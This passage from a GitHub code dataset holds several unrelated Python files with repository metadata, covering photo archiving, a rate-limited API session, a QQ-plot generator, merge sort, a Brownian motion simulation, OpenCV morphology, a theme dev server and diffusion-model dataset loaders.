\ntry:\n user_input = int(user_input)\nexcept ValueError:\n # If the conversion fails, user_input will remain a string\n pass\n\n#setting another variable to house the function for use in the following two lines\nnum_chairs = chair_number(user_input)\n\n#if they have sat in more than 50 chairs and are currently sitting in a chair\nif num_chairs > 50 and sit:\n #deliver a helpful reminder.\n print(\"you are sitting in a chair, and have sat in more than 50 chairs.\")\n#if the number of chairs they've sat in is equal to 420 or 69\nif num_chairs == 420 or num_chairs == 69:\n #let them know they've been caught.\n print(\"I see what you did there.\")\n\n#if the number of chairs exceeds 1000 \nif num_chairs > 1000:\n #setting a variable to hold the method by which the user sat in so many chairs\n yikes = input(\"how on earth have you sat in so many chairs\")\n #try to see if their input was an integer\n try:\n # if it is an integer, it will be recognized as such henceforth.\n yikes = int(yikes)\n #setting variable to hold an explanation\n varibul = input(\"what are you talking about?\")\n #check to see if their explanation is an integer\n try:\n #if it is, it shall remain that way\n varibul = int(varibul)\n #let the user know you don't understand what's happening.\n print(\"you're insane.\")\n #if int conversion returns valueError(basically, if the input was a string)\n except ValueError:\n #accept explaination\n print(\"ok, I see what you mean.\")\n #same deal here, if the input was a string\n except ValueError:\n #if it is this specific string\n if yikes == \"chairs\":\n #diagnose the user\n print(\"you're insane.\")\n #if it is any other string\n else:\n #feign suspicion\n print (\"sus.\")\n#if number of chairs is less than 50 and the user is not sitting in a chair\nif num_chairs <50 and not sit:\n #go nuts\n print(\"wowowowowowowowowow\")\n #just trying to fit a pass in here somewhere.\nelse:\n pass\n\n# END","repo_name":"theSam1998/Seattle-Ops-301n3-Challenges","sub_path":"OpsChal09.py","file_name":"OpsChal09.py","file_ext":"py","file_size_in_byte":5612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27632904044","text":"import pandas as pd\nimport numpy as np\nimport os\nimport datetime\nimport shutil\nimport sys\n\n# ---- define the file paths\npackage_root = os.path.dirname(os.path.abspath(''))\nlibrary = os.path.join(package_root, 'photo_libraries')\n\n# ---- get database\ndf = pd.read_hdf(os.path.abspath('photo_database.h5'), 'input')\nif 'datetime' not in df.columns:\n raise Exception('database does not contain image metadata')\n\n# ---- check that the dates are valid\ncheck_dt = df[pd.notnull(df.datetime)]\ninvalid_dt = check_dt[(check_dt.datetime > datetime.datetime.today()) |\n (check_dt.datetime < datetime.datetime.utcfromtimestamp(0))].index\ndf.loc[invalid_dt, 'datetime'] = np.nan\n\n# ---- create the photo archive folder\nroot = os.path.join(package_root, 'photo_archive')\ntry:\n os.mkdir(os.path.join(root))\n print('created photo archive')\nexcept FileExistsError:\n pass\n\n# ---- create folders for files that do not have metadata\nfor file_type in df.file_type.unique():\n try:\n os.mkdir(os.path.join(root, file_type))\n print('created sub-folder for {}'.format(file_type))\n except FileExistsError:\n pass\n\n# ---- create folder for images that do no have metadata\ntry:\n os.mkdir(os.path.join(root, 'image', 'unknown'))\n print('created sub-folder for images without metadata')\nexcept FileExistsError:\n pass\n\n# 
---- create folders for each unique year:\nif df.datetime.notnull().any():\n for year in df.datetime.dt.year.unique():\n if pd.notnull(year):\n try:\n os.mkdir(os.path.join(root, 'image', str(int(year))))\n print('created sub-folder: {}'.format(str(int(year))))\n except FileExistsError:\n pass\n\n# ---- create destination codes\ndef create_destinations(df):\n seed_since_epoch = int((datetime.datetime.now() - datetime.datetime.utcfromtimestamp(0)).total_seconds())\n rng = np.random.RandomState(seed_since_epoch)\n\n df['img_id'] = ['img_id_'+str(i).zfill(10) for i in rng.randint(0,1e10, len(df))]\n df['file_name'] = [df.filepath.loc[i][df.filepath.loc[i].rfind('/')+1:] for i in df.filepath.index]\n\n if df.datetime.notnull().any():\n df['file_name'] = np.where(pd.notnull(df.datetime), 'date_'+df.datetime.dt.strftime('%Y%m%d') + '_' + df.img_id + df.file_ext.str.lower(), df.file_name)\n\n destination = []\n for i in df.index:\n if pd.isnull(df.loc[i, 'datetime']):\n if df.loc[i, 'file_type'] == 'image':\n destination.append(os.path.join(root, df.loc[i, 'file_type'], 'unknown', df.loc[i, 'file_name']))\n else:\n destination.append(os.path.join(root, df.loc[i, 'file_type'], df.loc[i, 'file_name']))\n else:\n destination.append(os.path.join(root, df.loc[i, 'file_type'], df.loc[i, 'datetime'].strftime('%Y'), df.loc[i, 'file_name']))\n df['destination'] = destination\n return df\n\n\n# ---- function to move the file\ndef move_file(idx, df):\n try:\n shutil.move(df.loc[idx,'filepath'], df.loc[idx, 'destination'])\n\n except PermissionError:\n raise PermissionError('permission error moving {} to {}'\\\n .format(df.loc[idx, 'filepath'], df.loc[idx, 'destination']))\n return\n\n\n# ---- function to check for duplicate names and add DUPLICATE if it is\ndef check_for_duplicate_file_name(idx, df):\n i = 1\n while os.path.exists(df.loc[idx, 'destination']):\n if pd.isnull(df.loc[idx, 'datetime']):\n if df.loc[idx, 'file_type'] == 'image':\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n 'unknown', 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n else:\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n else:\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n df.loc[idx, 'datetime'].strftime('%Y'),\n 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n i += 1\n return df\n\n\n# ---- bring together the two functions above to move all of the images\ndef organize_files(df):\n for idx in df.index:\n # ---- make sure that the source file exists\n if not os.path.exists(df.loc[idx, 'filepath']):\n raise Exception('source file {} does not exist'.format(df.loc[idx, 'filepath']))\n else:\n df = check_for_duplicate_file_name(idx, df)\n move_file(idx, df)\n return df\n\n\ndf = create_destinations(df)\ndf = organize_files(df)\ndf.to_hdf('photo_database.h5', 'output')\n","repo_name":"alexdsbreslav/photo_organization","sub_path":"scripts/organize_files.py","file_name":"organize_files.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36273302500","text":"\"\"\"\nSession object used to maintain an open session with PTP\n\nAlmost entirely based off of session by kannibalox from their PTPAPI project on GitHub\n\nAuthor: Parker Timmerman\n\"\"\"\n\nimport logging\nimport requests\n\nfrom ptp_config import config\nfrom time import time, sleep\n\nLOGGER = 
logging.getLogger(__name__)\n\nclass TokenSession(requests.Session):\n \"\"\" Allow rate-limiting requests to a site \"\"\"\n\n def __init__(self, capacity, fill_rate):\n \"\"\" tokens is the total number of tokens in the bucket\n fill_rate is the rate in tokens/second that the bucket will be refilled.\n A request can be made when there are enough tokens in the bucket for the request \"\"\"\n\n requests.Session.__init__(self)\n self.capacity = float(capacity)\n self._tokens = float(capacity) # current tokens in bucket, start at capacity (full)\n self.consumed_tokens = 0\n self.fill_rate = float(fill_rate)\n self.timestamp = time()\n\n def consume(self, tokens):\n \"\"\" Consume tokens from the bucket. Returns True if there were enough tokens, otherwise False. \"\"\"\n\n self.update_tokens()\n if tokens < self._tokens:\n self._tokens -= tokens\n self.consumed_tokens += tokens\n LOGGER.debug(\"Consuming {0} token(s), total tokens consumed so far: {1}\".format(tokens, self.consumed_tokens))\n else:\n return False\n return True\n\n def request(self, *args, **kwargs):\n while not self.consume(1):\n LOGGER.debug(\"Waiting for token bucket to refull...\")\n sleep(1)\n return requests.Session.request(self, *args, **kwargs)\n\n def update_tokens(self):\n if self._tokens < self.capacity:\n now = time()\n delta = self.fill_rate * (now - self.timestamp)\n self._tokens = min(self.capacity, self._tokens + delta)\n self.timestamp = now\n return self._tokens\n\n tokens = (update_tokens)\n\n def base_get(self, url_path, *args, **kwargs):\n return self.get(config.get('Main', 'baseURL') + url_path, *args, **kwargs)\n\n def base_post(self, url_path, *args, **kwargs):\n return self.post(config.get('Main', 'baseURL') + url_path, *args, **kwargs)\n\nLOGGER.debug(\"Initializing token session\")\nsession = TokenSession(3, 0.5)\nsession.headers.update({\"User-Agent\": \"Wget/1.13.4\"})\n","repo_name":"ParkMyCar/MovieManSpiff","sub_path":"ptp_api/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18183014651","text":"\nimport json\nimport requests\n\nimport settings\nfrom constants import transactino_constants, model_constants, method_constants\nfrom util.input_args import input_args\nfrom util.get_path import get_path\nfrom util.make_headers import make_headers\nfrom util.check_for_announcements import check_for_announcements\n\nfrom .constants import subscription_constants\n\ndef activate(args):\n activate_args = input_args({\n subscription_constants.SUBSCRIPTION_ID: {\n method_constants.INPUT: 'Enter the Subscription ID to activate',\n method_constants.TYPE: str,\n },\n })\n\n payload = {\n transactino_constants.SCHEMA: {\n model_constants.MODELS: {\n model_constants.SUBSCRIPTION: {\n method_constants.METHODS: {\n subscription_constants.ACTIVATE: activate_args,\n },\n },\n },\n },\n }\n\n response = requests.post(\n settings.URL,\n headers=make_headers(),\n data=json.dumps(payload),\n )\n\n check_for_announcements(response)\n\n response_json = json.loads(response.text)\n activate_json = get_path(response_json, [\n transactino_constants.SCHEMA,\n model_constants.MODELS,\n model_constants.SUBSCRIPTION,\n method_constants.METHODS,\n subscription_constants.ACTIVATE,\n ])\n\n print(json.dumps(activate_json, 
indent=2))\n","repo_name":"NicholasPiano/transactino","sub_path":"jormungand/commands/subscription/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74277809927","text":"#!/usr/bin/env python\n# AUTHOR: William Stafford Noble\n# CREATE DATE: 16 March 2009\nimport sys\nimport os\nimport math\n\nusage = \"\"\"USAGE: make-qq-plot.py \n\nCompare a given set of p-values to the uniform distribution by\ncreating a QQ plot with log-log axes. The program outputs three\nfiles: a gnuplot script (.gnuplot), the data to be plotted\n(.txt) and the plot itself (.png). Note that the stored\nvalues are downsampled to avoid having too many points in the plot.\n\n\nOptions:\n --no-log-scale\n --column-header Header of column from which to get p-values.\n --minus-natural-log Input values are negative log base e.\n --format png|eps (default=png)\n --fontsize (only effective with \"-format eps\")\n --title \n\nIf the p-value file is specified as \"-\", then the program reads from\nstandard input.\n\n\"\"\"\n\n###############################################################################\n# Find a given word in a tab-delimited string of words.\n# Return the index.\ndef findWord(header, word):\n\n words = header.split(\"\\t\")\n for index in range(0, len(words)):\n if (words[index] == word):\n return(index)\n sys.stderr.write(\"Can't find %s in %s.\\n\" % (word, header))\n sys.exit(1)\n\n###############################################################################\n# MAIN\n###############################################################################\n\n# Set default values.\nlog_scale = 1\ncolumn_header = \"\"\nlog_values = 0\nfile_format = \"png\"\nfont_size = 24\ntitle = \"\"\n\n# Parse the command line.\nsys.argv = sys.argv[1:]\nwhile (len(sys.argv) > 2):\n next_arg = sys.argv[0]\n sys.argv = sys.argv[1:]\n if (next_arg == \"--no-log-scale\"):\n log_scale = 0\n elif (next_arg == \"--column-header\"):\n column_header = sys.argv[0]\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--minus-natural-log\"):\n log_values = 1\n elif (next_arg == \"--format\"):\n file_format = sys.argv[0]\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--fontsize\"):\n font_size = int(sys.argv[0])\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--title\"):\n title = sys.argv[0]\n sys.argv = sys.argv[1:]\n else:\n sys.stderr.write(\"Invalid option (%s).\\n\" % next_arg)\n sys.exit(1)\nif (len(sys.argv) != 2):\n sys.stderr.write(usage)\n sys.exit(1)\npvalue_filename = sys.argv[0]\nfileroot = sys.argv[1]\n\n# Open the file for reading.\nif (pvalue_filename == \"-\"):\n pvalue_file = sys.stdin\nelse:\n pvalue_file = open(pvalue_filename, \"r\")\n\n# If a header string was specified, find the relevant column.\nif (column_header != \"\"):\n header = pvalue_file.readline().rstrip()\n column_index = findWord(header, column_header)\n sys.stderr.write(\"Reading p-values from column %d.\\n\" % column_index)\nelse:\n column_index = 0\n\n# Read the p-values from the specified column.\npvalues = []\nnumZeroes = 0\nfor line in pvalue_file:\n line = line.rstrip()\n words = line.split(\"\\t\")\n\n # Skip comment lines.\n if (line[0] == \"#\"):\n continue\n\n # Crash if the line is too short.\n if (len(words) <= column_index):\n sys.stderr.write(\"Too few columns (%d < %d).\\n%s\\n\" \n % (len(words), column_index, line))\n sys.exit(1)\n\n # Skip NaNs.\n if ((words[column_index] == \"NaN\") or\n 
(words[column_index] == \"nan\")):\n continue\n\n pvalue = float(words[column_index])\n if (log_values):\n pvalue = math.exp(-1.0 * pvalue)\n\n # Count zero p-values.\n if (pvalue == 0):\n numZeroes += 1\n\n # Store this p-value.\n pvalues.append(pvalue)\n\npvalue_file.close()\nnum_pvalues = len(pvalues)\nif (numZeroes != 0):\n sys.stderr.write(\"Warning: Found %d zero p-values.\\n\" % numZeroes)\nsys.stderr.write(\"Read %d p-values from %s.\\n\" % (num_pvalues, \n pvalue_filename))\n\n# Sort the values.\npvalues.sort()\n\n# Open the data file.\ndata_filename = \"%s.txt\" % fileroot\ndata_file = open(data_filename, \"w\")\nsys.stderr.write(\"Creating %s.\\n\" % data_filename)\n\n# We will only print with this density along the x-axis.\nif (log_scale):\n increment = 0.01\nelse:\n increment = 0.001\ncurrent_value = 0\n\n# Print the values to a file.\nrank = 1.0\nnum_printed = 0\nfor pvalue in pvalues:\n\n if (log_scale):\n new_value = math.log(rank / num_pvalues)\n else:\n new_value = rank / num_pvalues\n\n if (current_value == 0) or (new_value >= current_value + increment):\n data_file.write(\"%g\\t%g\\n\" % (rank / num_pvalues, pvalue))\n current_value = new_value\n num_printed += 1\n\n rank += 1.0\ndata_file.close()\nsys.stderr.write(\"Printed %d p-values.\\n\" % num_printed)\n\n# Find the first non-zero p-value.\nfor index in range(0, len(pvalues)):\n min_pvalue = pvalues[index]\n if (min_pvalue != 0):\n break\n\n# Set the range.\nsys.stderr.write(\"Minimum p-value=%g\\n\" % min_pvalue)\nif (1.0 / num_pvalues < min_pvalue):\n min_pvalue = 1.0 / num_pvalues\n sys.stderr.write(\"Minimum rank p-value=%g\\n\" % min_pvalue)\nif (min_pvalue == 0):\n min_value = \"1e-10\"\nelse:\n min_value = \"1e%d\" % (int(math.log(min_pvalue, 10.0)) - 1)\nsys.stderr.write(\"Minimum x-axis value=%s\\n\" % min_value)\n\n# Open the gnuplot file.\ngnuplot_filename = \"%s.gnuplot\" % fileroot\ngnuplot_file = open(gnuplot_filename, \"w\")\nsys.stderr.write(\"Creating %s.\\n\" % gnuplot_filename)\n\n# Print the gnuplot file.\ngnuplot_file.write(\"set output '/dev/null'\\n\")\nif (file_format == \"png\"):\n gnuplot_file.write(\"set terminal png\\n\")\nelif (file_format == \"eps\"):\n gnuplot_file.write(\"set terminal postscript eps %s\\n\" % font_size)\nelse:\n sys.stderr.write(\"Invalid file format (%s).\\n\" % file_format)\n sys.exit(1)\ngnuplot_file.write(\"set xlabel 'Rank p-value'\\n\")\ngnuplot_file.write(\"set ylabel 'Calculated p-value'\\n\")\ngnuplot_file.write(\"set xrange [%s:1]\\n\" % min_value)\ngnuplot_file.write(\"set yrange [%s:1]\\n\" % min_value)\nif (log_scale):\n gnuplot_file.write(\"set logscale xy\\n\")\nif (title != \"\"):\n gnuplot_file.write(\"set title '%s'\\n\" % title)\ngnuplot_file.write(\"plot x notitle with lines lt 1\\n\")\ngnuplot_file.write(\"replot 0.5*x notitle with lines lt 2\\n\")\ngnuplot_file.write(\"replot 2.0*x notitle with lines lt 2\\n\")\ngnuplot_file.write(\"replot '%s' notitle with points\\n\" % data_filename)\ngnuplot_file.write(\"set output\\n\")\ngnuplot_file.write(\"replot\\n\")\ngnuplot_file.close()\n\n# Make the image.\nsys.stderr.write(\"Creating %s.%s.\\n\" % (fileroot, file_format))\nos.system(\"gnuplot %s > %s.%s\" % (gnuplot_filename, fileroot, file_format))\n\n","repo_name":"crux-toolkit/crux-toolkit","sub_path":"test/calibration/make-qq-plot.py","file_name":"make-qq-plot.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"16"} +{"seq_id":"24066709177","text":"def 
process(arr, left, right):\r\n \r\n if left == right:\r\n return\r\n \r\n mid = left + int((right-left)>>1)\r\n process(arr, left, mid)\r\n process(arr, mid + 1, right)\r\n merge(arr, left, mid, right)\r\n\r\n\r\n\r\ndef merge(arr, left, mid, right):\r\n \r\n help_list = [0] * (right-left+1)\r\n \r\n i = 0\r\n left_index = left\r\n right_index = mid + 1\r\n \r\n while left_index <= mid and right_index <= right:\r\n if arr[left_index] < arr[right_index]:\r\n help_list[i] = arr[left_index]\r\n left_index += 1\r\n else:\r\n help_list[i] = arr[right_index]\r\n right_index += 1\r\n i += 1\r\n while left_index <= mid:\r\n help_list[i] = arr[left_index]\r\n left_index += 1\r\n i += 1\r\n while right_index <= right:\r\n help_list[i] = arr[right_index]\r\n right_index += 1\r\n i += 1\r\n \r\n for i in range(right-left+1):\r\n arr[left+i] = help_list[i]\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n arr = list(range(20))\r\n\r\n import random\r\n random.shuffle(arr)\r\n print(arr)\r\n\r\n process(arr, 0, len(arr)-1)\r\n print(arr)\r\n\r\n# [4, 10, 8, 16, 17, 3, 13, 9, 15, 7, 14, 18, 11, 2, 5, 6, 1, 12, 19, 0]\r\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]\r\n","repo_name":"iubizi/014-merge-sort","sub_path":"merge sort.py","file_name":"merge sort.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71426528969","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\n##### PARAMETERS #####\n\nTf = 100000 # Final time - seconds\nm = 1 # Particle mass\ngamma = 2 # Friction\nkb = 1 # Boltzmann cte = 1 for simplicity\nT = 300 # [k] - Temperature\n\n\n###### Discrete time\nt = np.linspace(0, 1000, num = Tf)\ndt = t[2]-t[1]\n\n###### Noise\naux = np.zeros(Tf) # auxiliar array of the right size\n\n# Function to create random numbers\nRandom = lambda n: np.random.normal(loc=0.0, scale=1.0) # Generate random number\nMapRandom = map(Random,aux)\n\n# Array of Noise\neta = np.sqrt(2*kb*T*gamma)*np.array(list(MapRandom)) # eta(t)\n\n###### Initial position and velocity\n\nx0 = 0 \nv0 = 0 \n\n###### Arrays of position and velocities\n\nx = np.zeros(1)\nx[0] = x0\nv = np.zeros(1)\nv[0] = v0\n\n###### Discrete Langevin Equation\n\ni = 1\nwhile i < Tf:\n v = np.append(v, ((dt/m)*eta[i]+v[i-1])/(1+(dt/m)*gamma))\n x = np.append(x, x[i-1] + v[i]*dt)\n i+=1\nfig, (left, right) = plt.subplots(1, 2, figsize=(15,5))\n\nright.plot(t, x)\nleft.plot(t, v)\n\nfig.suptitle('1-D Броуновское движение', fontsize=20)\nright.set(xlabel = \"Время, с\", ylabel = \"x(t)\")\nleft.set(xlabel = \"Время, с\", ylabel = \"v(t)\")\n\nright.set_xlim([0, 1000]);\nleft.set_xlim([0, 1000]);\nplt.show()\n\n\n","repo_name":"chu412/Physical-modelling","sub_path":"Тема_Статистическая физика/brownian_motion_2.py","file_name":"brownian_motion_2.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"36577291335","text":"import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\ndef main():\n img = cv2.imread('2.jpg', 0)\n _, thresh = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)\n # erosion\n kernel = np.ones((11, 11), np.uint8)\n erosion = cv2.erode(thresh, kernel, iterations=1)\n # dilation\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n # Opening\n opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n # Closing\n closing = 
cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n # Display Images\n plt.subplot(321), plt.imshow(img, cmap = 'gray'), plt.axis('off')\n plt.title('Original Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(322),plt.imshow(thresh, cmap = 'gray')\n plt.title('Binary Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(323),plt.imshow(erosion, cmap = 'gray')\n plt.title('Eroded Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(324),plt.imshow(dilation, cmap = 'gray')\n plt.title('Dilated Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(325),plt.imshow(opening, cmap = 'gray')\n plt.title('Opening Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(326),plt.imshow(closing, cmap = 'gray')\n plt.title('Closing Image'), plt.xticks([]), plt.yticks([])\n plt.show()\n\nif __name__ == '__main__':\n main()","repo_name":"himanshuMaheshwari2311/Image-Processing-Lab","sub_path":"image-morphology/morphological_operation.py","file_name":"morphological_operation.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8937971730","text":"def factorial(n):\n if n == 0:\n return 1.0\n else:\n return n * factorial(n-1)\n\n\ndef taylor_exp(n):\n return [1.0/factorial(i) for i in range(n)]\n\n\ndef taylor_sin(n):\n res = []\n for i in range(n):\n if i % 2 == 1:\n res.append((-1)**((i-1)/2)/float(factorial(i)))\n else:\n res.append(0.0)\n return res\n\n\ndef benchmark():\n taylor_exp(500)\n taylor_sin(500)\n\n\nif __name__ == '__main__':\n benchmark()\n #python -m cProfile -o prof.out taylor.py\n #pyprof2calltree -i prof.out -o prof.calltree\n #kcachegrind prof.calltree # or qcachegrind prof.calltree\n #you can use instructions at https://github.com/rkern/line_profiler. 
kernprof.py -l -v simul.py","repo_name":"andrey-ladygin-loudclear/deep-learning","sub_path":"helper/factorial/taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1387060843","text":"# Script to assist with PVEDiscordDark development\r\n#\r\n# By default serves HTTP on port 3000, any *.js request gets the JS script, any *.css request gets the CSS file and any image request gets corresponding image\r\n# Meant to be used with the \"Requestly\" browser extension to redirect PVEDD requests from PVE server to localhost:3000\r\n#\r\n\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nimport json\r\nimport os\r\n\r\nPORT = 3000\r\nDIR_SASS = os.path.join(os.path.dirname(__file__), \"sass\")\r\nDIR_IMAGES = os.path.join(os.path.dirname(__file__), \"images\")\r\nDIR_JS = os.path.join(os.path.dirname(__file__), \"js\")\r\n\r\n\r\nclass Server(BaseHTTPRequestHandler):\r\n def log_message(self, format, *args):\r\n return\r\n\r\n def _set_headers(self, status, type):\r\n self.send_response(status)\r\n self.send_header(\"Content-type\", type)\r\n self.end_headers()\r\n\r\n def do_GET(self):\r\n status = 200\r\n type = \"application/json\"\r\n data = None\r\n\r\n file = self.path.rpartition(\"/\")[2]\r\n ext = file.rpartition(\".\")[2]\r\n\r\n if ext == \"css\":\r\n data = open(os.path.join(DIR_SASS, \"PVEDiscordDark.css\"), \"rb\").read()\r\n type = \"text/css\"\r\n elif ext == \"js\":\r\n data = open(os.path.join(DIR_JS, \"PVEDiscordDark.js\"), \"rb\").read()\r\n type = \"application/javascript\"\r\n elif ext == \"png\" or ext == \"jpg\" or ext == \"jpeg\":\r\n try:\r\n data = open(os.path.join(DIR_IMAGES, file), \"rb\").read()\r\n type = f\"image/{ext}\"\r\n except FileNotFoundError:\r\n status = 404\r\n elif ext == \"svg\":\r\n try:\r\n data = open(os.path.join(DIR_IMAGES, file), \"rb\").read()\r\n type = f\"image/svg+xml\"\r\n except FileNotFoundError:\r\n status = 404\r\n else:\r\n status = 400\r\n self._set_headers(status, type)\r\n if status == 200:\r\n self.wfile.write(data)\r\n else:\r\n self.wfile.write(json.dumps({\"error\": status}).encode())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(f\"Serving on localhost:{PORT}\")\r\n server = HTTPServer(server_address=(\"\", PORT), RequestHandlerClass=Server)\r\n try:\r\n server.serve_forever()\r\n except KeyboardInterrupt:\r\n quit()\r\n","repo_name":"Weilbyte/PVEDiscordDark","sub_path":"PVEDiscordDark/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"16"} +{"seq_id":"74164189127","text":"from torch.utils.data import Dataset\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nimport numpy as np\nimport torch\nimport math\nimport random\nfrom PIL import Image\nimport os\nimport glob\nimport einops\nimport torchvision.transforms.functional as F\n\n\nclass UnlabeledDataset(Dataset):\n def __init__(self, dataset):\n self.dataset = dataset\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n data = tuple(self.dataset[item][:-1]) # remove label\n if len(data) == 1:\n data = data[0]\n return data\n\n\nclass LabeledDataset(Dataset):\n def __init__(self, dataset, labels):\n self.dataset = dataset\n self.labels = labels\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n return self.dataset[item], 
self.labels[item]\n\n\nclass CFGDataset(Dataset): # for classifier free guidance\n def __init__(self, dataset, p_uncond, empty_token):\n self.dataset = dataset\n self.p_uncond = p_uncond\n self.empty_token = empty_token\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n x, label = self.dataset[item]\n y = 0\n if type(label) == np.ndarray: # If need to keep the label\n if label[1] == 1: # if label[1] == 1, this is a true label or high confidence prediction, Keep labels\n y = label[0]\n elif label[1] != 0: # for exp6\n if random.random() < self.p_uncond * (1-label[1]):\n y = self.empty_token\n else:\n y = label[0]\n elif random.random() < self.p_uncond: # set label none with probability p_uncond\n y = self.empty_token\n else: # keep the label if not set to none\n y = label[0]\n\n else: # if label is not a numpy array, then we don't need to keep labels\n if random.random() < self.p_uncond:\n y = self.empty_token\n else:\n y = label\n\n return x, np.int64(y)\n\n\nclass DatasetFactory(object):\n\n def __init__(self):\n self.train = None\n self.test = None\n\n def get_split(self, split, labeled=False):\n if split == \"train\":\n dataset = self.train\n elif split == \"test\":\n dataset = self.test\n else:\n raise ValueError\n\n if self.has_label:\n return dataset if labeled else UnlabeledDataset(dataset)\n else:\n assert not labeled\n return dataset\n\n def unpreprocess(self, v): # to B C H W and [0, 1]\n v = 0.5 * (v + 1.)\n v.clamp_(0., 1.)\n return v\n\n @property\n def has_label(self):\n return True\n\n @property\n def data_shape(self):\n raise NotImplementedError\n\n @property\n def data_dim(self):\n return int(np.prod(self.data_shape))\n\n @property\n def fid_stat(self):\n return None\n\n def sample_label(self, n_samples, device):\n raise NotImplementedError\n\n def label_prob(self, k):\n raise NotImplementedError\n\n\n# CIFAR10\n\nclass CIFAR10(DatasetFactory):\n r\"\"\" CIFAR10 dataset\n\n Information of the raw dataset:\n train: 50,000\n test: 10,000\n shape: 3 * 32 * 32\n \"\"\"\n\n def __init__(self, path, random_flip=False, cfg=False, p_uncond=None, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n\n transform_train = [transforms.ToTensor(), transforms.Normalize(0.5, 0.5)]\n transform_test = [transforms.ToTensor(), transforms.Normalize(0.5, 0.5)]\n if random_flip: # only for train\n transform_train.append(transforms.RandomHorizontalFlip())\n transform_train = transforms.Compose(transform_train)\n transform_test = transforms.Compose(transform_test)\n self.train = datasets.CIFAR10(path, train=True, transform=transform_train, download=True)\n self.test = datasets.CIFAR10(path, train=False, transform=transform_test, download=True)\n\n if cluster_path is not None:\n print(f'renew targets from {cluster_path}')\n self.train.targets = np.load(cluster_path)\n assert len(self.train.targets) == 50000\n self.K = max(self.train.targets) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.train.targets) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 3, 32, 32\n\n @property\n def fid_stat(self):\n return 
'assets/fid_stats/fid_stats_cifar10_train_pytorch.npz'\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# ImageNet\n\n\nclass FeatureDataset(Dataset):\n def __init__(self, path):\n super().__init__()\n self.path = path\n # names = sorted(os.listdir(path))\n # self.files = [os.path.join(path, name) for name in names]\n\n def __len__(self):\n return 1_281_167 * 2 # consider the random flip\n\n def __getitem__(self, idx):\n path = os.path.join(self.path, f'{idx}.npy')\n z, label = np.load(path, allow_pickle=True)\n return z, label\n\n\nclass ImageNet256Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = FeatureDataset(path)\n print('Prepare dataset ok')\n self.K = 1000\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet256_guided_diffusion.npz'\n\n def sample_label(self, n_samples, 